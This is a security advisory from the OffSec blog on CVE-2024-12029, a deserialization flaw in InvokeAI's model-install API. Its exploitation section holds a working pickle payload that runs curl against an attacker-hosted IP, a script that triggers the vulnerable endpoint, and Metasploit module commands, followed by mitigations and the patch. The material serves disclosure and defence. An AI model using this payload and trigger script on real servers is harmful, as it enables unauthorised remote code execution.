Home OffSec
  • Pricing
Blog

/

CVE-2024-12029 – InvokeAI Deserialization of Untrusted Data vulnerability

Research & Tutorials

Jul 17, 2025

CVE-2024-12029 – InvokeAI Deserialization of Untrusted Data vulnerability

CVE-2024-12029: A critical deserialization vulnerability in InvokeAI’s /api/v2/models/install endpoint allows remote code execution via malicious model files. Exploit risk for AI art servers.

OffSec Team OffSec Team

0 min read

Overview

CVE-2024-12029 is a Deserialization of Untrusted Data vulnerability in the /api/v2/models/install API endpoint of InvokeAI, a popular AI art generation tool. By sending specially crafted model files, attackers can exploit this flaw to achieve remote code execution on the server.

 

  • CVE ID: CVE-2024-12029
  • Severity: Critical
  • CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
  • EPSS Score: 61.17%
  • Published: February 7, 2025
  • Impact: Remote Code Execution
  • Attack Vector: Remote
  • Authentication Required: No
  • Vulnerable Component: Model installation API using unsafe torch.load() deserialization

This vulnerability affects any InvokeAI installation that exposes the model installation API to untrusted users or networks.

Technical Breakdown

The /api/v2/models/install API endpoint accepts user-specified model URLs for downloading and loading AI models. InvokeAI uses PyTorch’s torch.load() function to deserialize model files without proper validation or sandboxing.

PyTorch’s torch.load() function can execute arbitrary Python code embedded within serialized model files. By crafting a malicious model file with embedded Python code, an attacker can achieve remote code execution when the model is loaded server-side.


Conditions for Exploitation

  • The InvokeAI instance is running a vulnerable version (5.3.1 through 5.4.2).
  • The /api/v2/models/install endpoint is accessible to the attacker.
  • The attacker can host a malicious model file on a web server or provide a URL to it.
  • Model validation and sandboxing are not properly implemented.
  • The InvokeAI process has sufficient privileges to execute the embedded malicious code.

Vulnerable Code Snippet

The vulnerability is due to unsafe usage of PyTorch’s torch.load in function read_checkpoint_meta at location invokeai/backend/model_manager/util/model_util.py.

https://github.com/invoke-ai/InvokeAI/blob/3f880496f7d1494afb5d4136887cd06e61790d71/invokeai/backend/model_manager/util/model_util.py#L47-L65

def read_checkpoint_meta(path: Union[str, Path], scan: bool = False) -> Dict[str, torch.Tensor]:
    if str(path).endswith(".safetensors"):
        try:
            path_str = path.as_posix() if isinstance(path, Path) else path
            checkpoint = _fast_safetensors_reader(path_str)
        except Exception:
            # TODO: create issue for support "meta"?
            checkpoint = safetensors.torch.load_file(path, device="cpu")
    else:
        if scan:
            scan_result = scan_file_path(path)
            if scan_result.infected_files != 0:
                raise Exception(f'The model file "{path}" is potentially infected by malware. Aborting import.')
        if str(path).endswith(".gguf"):
            # The GGUF reader used here uses numpy memmap, so these tensors are not loaded into memory during this function
            checkpoint = gguf_sd_loader(Path(path), compute_dtype=torch.float32)
        else:
            checkpoint = torch.load(path, map_location=torch.device("meta"))
    return checkpoint

Exploitation Steps

  1. Create a malicious PyTorch model file with embedded Python code:
import asyncio
import pickle
import requests
import torch


class Payload:
  def __reduce__(self):
      import os
      return (os.system, ('curl 192.168.48.3/rce_poc',))
    
def generate_payload():
  # Not .pkl
  with open('payload.ckpt', 'wb') as f:
    pickle.dump(Payload(), f)

     2. Host the malicious model file on a web server accessible to the target.

     3. Exploit the Python script below that triggers the InvokeAI model installation API
         with our malicious model.

def request_model_download():
  import requests


  url = "http://localhost:9090/api/v2/models/install"
  params = {
      "source": "http://192.168.48.3/payload.ckpt",
      "inplace": "true"
  }
  response = requests.post(url, params=params, json={})


request_model_download()

    4. The malicious code will execute when InvokeAI attempts to load the model using
         torch.load().

Exploitation with Metasploit

Metasploit includes a module for this CVE that can be used for exploitation:

# In Metasploit console
use exploit/linux/http/invokeai_rce_cve_2024_12029
set RHOSTS target_ip
set RPORT 9090
set LHOST attacker_ip
set LPORT 4444
exploit

Mitigation

  • Update InvokeAI to version 5.4.3 or later where unsafe deserialization is fixed.
  • Use safe model loading practices with torch.load():
    • Use torch.load() with weights_only=True parameter
    • Implement proper input validation and sandboxing
    • Use allowlists for trusted model sources
  • Network Segmentation: Restrict access to the /api/v2/models/install endpoint.
  • Input Validation: Validate model file signatures and contents before loading.
  • Principle of Least Privilege: Run InvokeAI with minimal necessary permissions.

Patch

InvokeAI resolved this issue by making the scan variable equal to True by default that the vulnerable function takes.

def read_checkpoint_meta(path: Union[str, Path], scan: bool = True) -> Dict[str, torch.Tensor]:
    if str(path).endswith(".safetensors"):
        try:
            path_str = path.as_posix() if isinstance(path, Path) else path
            checkpoint = _fast_safetensors_reader(path_str)
        except Exception:
            # TODO: create issue for support "meta"?
            checkpoint = safetensors.torch.load_file(path, device="cpu")
    elif str(path).endswith(".gguf"):
        # The GGUF reader used here uses numpy memmap, so these tensors are not loaded into memory during this function
        checkpoint = gguf_sd_loader(Path(path), compute_dtype=torch.float32)
    else:
        if scan:
            scan_result = pscan.scan_file_path(path)
            if scan_result.infected_files != 0:
                raise Exception(f"The model at {path} is potentially infected by malware. Aborting import.")
            if scan_result.scan_err:
                raise Exception(f"Error scanning model at {path} for malware. Aborting import.")


        checkpoint = torch.load(path, map_location=torch.device("meta"))
    return checkpoint

Patch to the vulnerability can be found in this commit, 

References

Stay in the know: Become an OffSec Insider

Stay in the know: Become an OffSec Insider

Get the latest updates about resources, events & promotions from OffSec!

Latest from OffSec